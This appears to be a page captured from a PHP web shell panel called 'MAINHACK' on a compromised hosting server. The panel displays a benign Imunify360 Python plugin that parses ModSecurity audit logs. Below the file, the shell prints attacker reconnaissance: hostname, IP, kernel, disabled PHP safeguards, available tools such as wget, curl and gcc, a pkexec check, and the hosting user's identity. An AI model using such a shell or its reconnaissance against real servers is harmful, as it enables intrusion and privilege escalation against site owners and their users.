[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: modsec.py
File is not writable. Editing disabled.
#!/opt/imunify360/venv/bin/python3
"""Sensor plugin that turns modsec audit log lines into sensor incidents."""
import time
from collections import deque
from logging import getLogger

from defence360agent.contracts.messages import MessageType
from defence360agent.contracts.plugins import LogStreamReader
from defence360agent.subsys.panels.base import PanelException
from defence360agent.utils import RecurringCheckStop, recurring_check
from defence360agent.utils.common import MINUTE, rate_limit
from im360.subsys import modsec_audit_log
from im360.subsys.panels.hosting_panel import HostingPanel

PLUGIN_ID = "modsec"

logger = getLogger(__name__)
# logger.warning wrapped by rate_limit with a period of 5 * MINUTE; used for
# reporting accumulated parse errors.
throttled_log_exception = rate_limit(period=5 * MINUTE)(logger.warning)


class ModsecSensor(LogStreamReader):
    """Read audit log lines, parse them and report incidents to the sink.

    Each line read from the stream is fed to ``self._parser``; every
    incident the parser returns is stamped with a timestamp and a domain
    and sent to ``self._sink`` as a ``MessageType.SensorIncident``.
    """

    # Both buffers are class attributes, so they are shared by every
    # instance of the sensor.
    # Recent parse failures as (joined context bytes, exception) pairs.
    error_buffer = deque(maxlen=100)
    # The most recently read raw lines, kept as context for parse failures.
    context_buffer = deque(maxlen=10)

    async def create_sensor(self, loop, sink):
        """Select a parser from the panel's log paths, then defer to the base.

        * no audit log path          -> no parser (``None``)
        * audit log path, no log dir -> ``SerialLogParser``
        * audit log path and log dir -> ``RevolverParser`` on that directory
        """
        log_file, log_dir = self._get_log_paths()
        self.source_file = log_file
        if log_file is None:
            parser = None
        elif log_dir is None:
            parser = modsec_audit_log.SerialLogParser()
        else:
            parser = modsec_audit_log.RevolverParser(
                audit_logdir_path=log_dir
            )
        self._parser = parser
        await super().create_sensor(loop, sink)

    def _get_log_paths(self):
        """Return ``(audit_log_path, audit_logdir_path)`` from the panel.

        A getter that raises ``PanelException`` is logged and contributes
        ``None`` to the returned tuple.
        """
        panel = HostingPanel()
        paths = []
        for getter in (panel.get_audit_log_path, panel.get_audit_logdir_path):
            try:
                path = getter()
            except PanelException as exc:
                logger.warning("%s failed: %s", getter, exc)
                path = None
            paths.append(path)
        return tuple(paths)

    @recurring_check(0)
    async def _infinite_read_and_proceed(self, stream_reader):
        """Read one line from *stream_reader* and process it.

        Raises ``RecurringCheckStop`` on end of stream (presumably this is
        what ends the ``recurring_check`` loop -- confirm against the
        decorator).
        """
        try:
            line = await stream_reader.readline()
        except ValueError as exc:
            # If limit was reached but no full line was consumed
            logger.warning(exc)
            return

        if not line:  # eof
            # Report whatever errors are still pending before stopping.
            if self.error_buffer:
                throttled_log_exception(self.formatted_error_buffer())
            self.error_buffer.clear()
            self.context_buffer.clear()
            raise RecurringCheckStop()

        self.context_buffer.append(line)
        try:
            incidents = self._parser.feed(line)
        except (
            modsec_audit_log.ParseError,
            modsec_audit_log.MalformedFileError,
        ) as exc:
            # Remember the failure with the recent lines as context; it is
            # logged later, on the next successful parse or at eof.
            self.error_buffer.append((b"".join(self.context_buffer), exc))
            return

        if self.error_buffer:  # there were errors previously
            throttled_log_exception(self.formatted_error_buffer())
            self.error_buffer.clear()

        if not incidents:
            return

        # All incidents produced by this line share one timestamp.
        now = time.time()
        for incident in incidents:
            incident["timestamp"] = now
            headers = incident.get("advanced", {}).get("headers", [])
            incident["domain"] = dict(headers).get("Host")
            await self._sink.process_message(
                MessageType.SensorIncident(incident)
            )

    def formatted_error_buffer(self):
        """Return the buffered parse errors as one newline-joined string."""
        return "\n".join(
            f"{error} in the context of {context}"
            for context, error in self.error_buffer
        )
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 690.32 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: N/A